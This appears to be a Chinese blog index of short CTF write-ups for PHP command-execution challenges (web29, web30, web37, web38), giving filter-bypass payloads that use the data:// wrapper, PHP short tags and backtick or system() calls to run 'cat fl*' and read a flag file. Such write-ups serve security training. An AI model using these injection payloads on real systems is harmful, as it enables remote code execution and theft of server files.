0%

web 37

img
考察data伪协议,data伪协议需满足allow_url_fopen,allow_url_include同时开启才能使用。
payload:

1
/?c=data://text/plain,<?php system("cat fl*");?>

web38

img
php被过滤了,可以用短标签绕过php。
短标签:比更灵活调用的方法
paylaod:

1
2
?c=data://text/plain,<?=`cat fla*`;?>
/?c=data://text/plain,<?=system("cat fl*");?>
阅读全文 »

web29

img
过滤了flag,可以用system,echo等。

1
2
/?c=system("cat fla*");
/?c=echo`cat fl*`;

web30

img
多过滤了一个system,还可以用echo。

1
/?echo`cat fl*`;
阅读全文 »